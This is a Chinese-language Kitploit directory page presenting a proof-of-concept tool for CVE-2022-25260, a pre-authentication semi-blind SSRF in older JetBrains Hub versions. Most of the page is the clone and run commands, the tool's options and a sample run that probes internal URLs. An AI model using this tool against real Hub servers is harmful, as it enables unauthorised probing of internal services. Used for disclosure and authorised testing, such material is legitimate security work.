Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-25260 — CVE-2022-25260 的 PoC:JetBrains Hub 中的预认证半盲 SSRF | Kitploit
工具/GitHubGitHub/yuriisanin/cve-2022-25260
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集
GitHubyuriisanin/cve-2022-25260

CVE-2022-25260

CVE-2022-25260 的 PoC:JetBrains Hub 中的预认证半盲 SSRF

查看仓库
4314年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-25260

JetBrains Hub 预认证半盲服务器端请求伪造(SSRF)

使用要求

  • JetBrains Hub <2021.1.14276
  • 2021.1.14276 之前的 JetBrains Hub 存在访问控制不当问题(CVE-2022-34894),即使禁用了访客用户,攻击者也能在未认证的情况下创建不受信任的服务。这使得无需任何其他条件即可利用该漏洞(通常情况下,攻击者至少需要经过身份验证)。

使用方法

安装并运行:

root@kitploit:~
$ git clone https://github.com/yuriisanin/CVE-2022-25260
$ cd CVE-2022-25260/
$ python3 exploit.py -h

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
usage: exploit.py [-h] -hub_url HUB_URL -email EMAIL [-internal_urls_file INTERNAL_URLS_FILE] [-internal_url INTERNAL_URL]

optional arguments:
  -h, --help            show this help message and exit
  -hub_url HUB_URL      Target Hub instance
  -email EMAIL          Email address of any user in the system
  -internal_urls_file INTERNAL_URLS_FILE
                        Path to internal service URLs file
  -internal_url INTERNAL_URL
                        Internal service URL
  

用法示例:

root@kitploit:~
$ python3 exploit.py hub_url http://localhost:8080 -email [email protected] -internal_urls_file ./assets/payloads/urls.txt

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
[INFO] - staring scanning for 14 urls.
[INFO] - trying to create Hub service.
[INFO] - Hub service create, serviceId: '02cc6043-1469-4a8e-9a74-b003e721620c'.
[INFO] - trying to request: 'http://127.0.0.1:8080'.
[INFO] - OK. Host 'http://127.0.0.1:8080' is running HTTP service (XML-like response) [FOUND]. Message: 'Attribute name "ng-strict-di" associated with an element type "html" must be followed by the ' = ' character.'.
[INFO] - trying to request: 'http://127.0.0.1:8081'.
[INFO] - OK. Host 'http://127.0.0.1:8081' is DOWN.
[INFO] - trying to request: 'http://google.com'.
[INFO] - OK. Host 'http://google.com' is running HTTP service (presumably XML-like response) [FOUND]. Message: 'The markup in the document preceding the root element must be well-formed.'.

演示:

CVE-2022-24342 Demo

它是如何工作的?

该漏洞是由于 Apache Batik 在默认设置下被用于栅格化用户提供的 SVG 图标而导致的。你可以在此处找到有关利用服务器端 SVG 栅格化的更多信息。

支持

你可以在 Twitter、GitHub 或 YouTube 上关注我。

下载工具